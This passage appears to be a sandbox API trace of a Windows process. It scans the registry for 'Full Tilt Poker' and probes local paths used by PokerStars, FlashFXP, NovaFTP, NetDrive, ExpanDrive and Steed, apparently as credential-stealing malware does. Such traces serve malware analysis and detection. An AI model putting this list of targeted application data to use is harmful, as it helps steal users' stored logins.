(hKey=0x204) returned 0x0 [0063.961] GetProcessHeap () returned 0x620000 [0063.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638dc8 | out: hHeap=0x620000) returned 1 [0063.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.962] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x2, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="Microsoft", pcchName=0x19fb90) returned 0x0 [0063.962] GetProcessHeap () returned 0x620000 [0063.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0063.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.963] RegOpenKeyW (in: hKey=0x210, lpSubKey="Microsoft", phkResult=0x63b6a0 | out: phkResult=0x63b6a0*=0x204) returned 0x0 [0063.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.965] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0063.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.966] RegCloseKey (hKey=0x204) returned 0x0 [0063.966] GetProcessHeap () returned 0x620000 [0063.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0063.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.967] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x3, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="Netscape", pcchName=0x19fb90) returned 0x0 [0063.967] GetProcessHeap () returned 0x620000 [0063.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0063.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.969] RegOpenKeyW (in: hKey=0x210, lpSubKey="Netscape", phkResult=0x63b520 | out: phkResult=0x63b520*=0x204) returned 0x0 [0063.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.970] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0063.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.971] RegCloseKey (hKey=0x204) returned 0x0 [0063.971] GetProcessHeap () returned 0x620000 [0063.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0063.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.972] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x4, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="ODBC", pcchName=0x19fb90) returned 0x0 [0063.972] GetProcessHeap () returned 0x620000 [0063.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0063.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.974] RegOpenKeyW (in: hKey=0x210, lpSubKey="ODBC", phkResult=0x63b610 | out: phkResult=0x63b610*=0x204) returned 0x0 [0063.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.975] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0063.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.976] RegCloseKey (hKey=0x204) returned 0x0 [0063.976] GetProcessHeap () returned 0x620000 [0063.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0063.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.977] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x5, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="Policies", pcchName=0x19fb90) returned 0x0 [0063.977] GetProcessHeap () returned 0x620000 [0063.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0063.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.979] RegOpenKeyW (in: hKey=0x210, lpSubKey="Policies", phkResult=0x63b540 | out: phkResult=0x63b540*=0x204) returned 0x0 [0063.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.980] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0063.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.987] RegCloseKey (hKey=0x204) returned 0x0 [0063.987] GetProcessHeap () returned 0x620000 [0063.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0063.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.988] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x6, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="RegisteredApplications", pcchName=0x19fb90) returned 0x0 [0063.988] GetProcessHeap () returned 0x620000 [0063.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5c0 [0063.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.990] RegOpenKeyW (in: hKey=0x210, lpSubKey="RegisteredApplications", phkResult=0x63b5c0 | out: phkResult=0x63b5c0*=0x204) returned 0x0 [0063.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.991] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0063.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.992] RegCloseKey (hKey=0x204) returned 0x0 [0063.992] GetProcessHeap () returned 0x620000 [0063.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5c0 | out: hHeap=0x620000) returned 1 [0063.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.993] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x7, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="Wow6432Node", pcchName=0x19fb90) returned 0x0 [0063.993] GetProcessHeap () returned 0x620000 [0063.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0063.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.995] RegOpenKeyW (in: hKey=0x210, lpSubKey="Wow6432Node", phkResult=0x63b660 | out: phkResult=0x63b660*=0x204) returned 0x0 [0063.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.996] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0063.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.997] RegCloseKey (hKey=0x204) returned 0x0 [0063.997] GetProcessHeap () returned 0x620000 [0063.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0063.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.998] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x8, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="Classes", pcchName=0x19fb90) returned 0x0 [0063.998] GetProcessHeap () returned 0x620000 [0063.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0063.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.000] RegOpenKeyW (in: hKey=0x210, lpSubKey="Classes", phkResult=0x63b4d0 | out: phkResult=0x63b4d0*=0x204) returned 0x0 [0064.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.001] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0064.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.002] RegCloseKey (hKey=0x204) returned 0x0 [0064.002] GetProcessHeap () returned 0x620000 [0064.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0064.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.003] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x9, pszName=0x63a478, pcchName=0x19fb90 | out: pszName="", pcchName=0x19fb90) returned 0x103 [0064.003] GetProcessHeap () returned 0x620000 [0064.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.005] RegCloseKey (hKey=0x210) returned 0x0 [0064.005] GetProcessHeap () returned 0x620000 [0064.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634e28 | out: hHeap=0x620000) returned 1 [0064.005] GetProcessHeap () returned 0x620000 [0064.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.006] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.006] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0064.007] Sleep (dwMilliseconds=0xa) [0064.079] GetProcessHeap () returned 0x620000 [0064.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.080] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.081] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0064.081] GetProcessHeap () returned 0x620000 [0064.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x62) returned 0x638b60 [0064.081] GetProcessHeap () returned 0x620000 [0064.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.081] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\pokerstars*"), lpFindFileData=0x19f934 | out: lpFindFileData=0x19f934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x6, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x638b60, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x626c48, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x1010000, dwReserved1=0x11, cFileName="\x11", cAlternateFileName="ᕿ酰愋"")) returned 0xffffffff [0064.082] GetProcessHeap () returned 0x620000 [0064.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.082] GetProcessHeap () returned 0x620000 [0064.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.082] GetProcessHeap () returned 0x620000 [0064.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0064.082] GetProcessHeap () returned 0x620000 [0064.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b680 [0064.082] GetProcessHeap () returned 0x620000 [0064.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.083] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.083] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0064.083] GetProcessHeap () returned 0x620000 [0064.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5a) returned 0x63b8c0 [0064.084] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.085] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\ExpanDrive", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0064.085] GetProcessHeap () returned 0x620000 [0064.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0064.085] GetProcessHeap () returned 0x620000 [0064.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.086] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0064.086] GetProcessHeap () returned 0x620000 [0064.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.086] GetProcessHeap () returned 0x620000 [0064.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.086] GetProcessHeap () returned 0x620000 [0064.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.087] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.087] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0064.087] GetProcessHeap () returned 0x620000 [0064.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5a) returned 0x63b8c0 [0064.088] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.088] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\ExpanDrive", arglist=0x19fb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0064.089] GetProcessHeap () returned 0x620000 [0064.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0064.089] GetProcessHeap () returned 0x620000 [0064.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.090] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0064.090] GetProcessHeap () returned 0x620000 [0064.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.091] GetProcessHeap () returned 0x620000 [0064.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.091] GetProcessHeap () returned 0x620000 [0064.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.091] GetProcessHeap () returned 0x620000 [0064.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b680 | out: hHeap=0x620000) returned 1 [0064.091] GetProcessHeap () returned 0x620000 [0064.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63b6b0 [0064.092] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.092] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0064.092] GetProcessHeap () returned 0x620000 [0064.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x637b20 [0064.092] GetProcessHeap () returned 0x620000 [0064.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.093] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0064.094] GetProcessHeap () returned 0x620000 [0064.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637b20 | out: hHeap=0x620000) returned 1 [0064.094] GetProcessHeap () returned 0x620000 [0064.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x400) returned 0x63a478 [0064.094] GetProcessHeap () returned 0x620000 [0064.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b4d0 [0064.094] GetProcessHeap () returned 0x620000 [0064.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.094] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.095] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0064.095] GetProcessHeap () returned 0x620000 [0064.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f56) returned 0x63b8c0 [0064.095] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.096] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0064.096] GetProcessHeap () returned 0x620000 [0064.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0064.096] GetProcessHeap () returned 0x620000 [0064.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.097] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0064.097] GetProcessHeap () returned 0x620000 [0064.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.098] GetProcessHeap () returned 0x620000 [0064.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.098] GetProcessHeap () returned 0x620000 [0064.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.099] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.099] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0064.099] GetProcessHeap () returned 0x620000 [0064.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f56) returned 0x63b8c0 [0064.100] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.101] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\FlashFXP", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0064.101] GetProcessHeap () returned 0x620000 [0064.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0064.101] GetProcessHeap () returned 0x620000 [0064.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.102] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0064.103] GetProcessHeap () returned 0x620000 [0064.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.103] GetProcessHeap () returned 0x620000 [0064.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.103] GetProcessHeap () returned 0x620000 [0064.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.104] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.104] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\ProgramData") returned 0x0 [0064.105] GetProcessHeap () returned 0x620000 [0064.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f56) returned 0x63b8c0 [0064.106] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.107] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\FlashFXP", arglist=0x19fb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0064.107] GetProcessHeap () returned 0x620000 [0064.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x62d510 [0064.107] GetProcessHeap () returned 0x620000 [0064.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.108] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0064.109] GetProcessHeap () returned 0x620000 [0064.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.109] GetProcessHeap () returned 0x620000 [0064.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d510 | out: hHeap=0x620000) returned 1 [0064.109] GetProcessHeap () returned 0x620000 [0064.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b6b0 [0064.110] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.110] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63b6b0 | out: pszPath="C:\\ProgramData") returned 0x0 [0064.110] GetProcessHeap () returned 0x620000 [0064.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f56) returned 0x63b8c0 [0064.111] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.112] wvsprintfW (in: param_1=0x63b8c0, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0064.112] GetProcessHeap () returned 0x620000 [0064.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x62d210 [0064.112] GetProcessHeap () returned 0x620000 [0064.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8c0 | out: hHeap=0x620000) returned 1 [0064.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.113] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0064.113] GetProcessHeap () returned 0x620000 [0064.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.114] GetProcessHeap () returned 0x620000 [0064.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d210 | out: hHeap=0x620000) returned 1 [0064.114] GetProcessHeap () returned 0x620000 [0064.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.114] GetProcessHeap () returned 0x620000 [0064.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b4d0 | out: hHeap=0x620000) returned 1 [0064.114] GetProcessHeap () returned 0x620000 [0064.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.115] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.115] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0064.115] GetProcessHeap () returned 0x620000 [0064.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x63b6b0 [0064.116] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.117] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0064.117] GetProcessHeap () returned 0x620000 [0064.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a688 [0064.117] GetProcessHeap () returned 0x620000 [0064.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.118] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0064.118] GetProcessHeap () returned 0x620000 [0064.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a688 | out: hHeap=0x620000) returned 1 [0064.119] GetProcessHeap () returned 0x620000 [0064.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.119] GetProcessHeap () returned 0x620000 [0064.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63b6b0 [0064.120] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.120] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19fb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0064.121] GetProcessHeap () returned 0x620000 [0064.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x637f20 [0064.121] GetProcessHeap () returned 0x620000 [0064.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.127] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0064.127] GetProcessHeap () returned 0x620000 [0064.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637f20 | out: hHeap=0x620000) returned 1 [0064.127] GetProcessHeap () returned 0x620000 [0064.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63b6b0 [0064.128] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.129] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0064.129] GetProcessHeap () returned 0x620000 [0064.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x6373a0 [0064.129] GetProcessHeap () returned 0x620000 [0064.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.130] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0064.130] GetProcessHeap () returned 0x620000 [0064.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6373a0 | out: hHeap=0x620000) returned 1 [0064.131] GetProcessHeap () returned 0x620000 [0064.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.131] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.132] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\ProgramData") returned 0x0 [0064.132] GetProcessHeap () returned 0x620000 [0064.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63b6b0 [0064.133] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.133] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0064.133] GetProcessHeap () returned 0x620000 [0064.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x638b60 [0064.134] GetProcessHeap () returned 0x620000 [0064.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.135] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0064.135] GetProcessHeap () returned 0x620000 [0064.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.135] GetProcessHeap () returned 0x620000 [0064.136] HeapFree 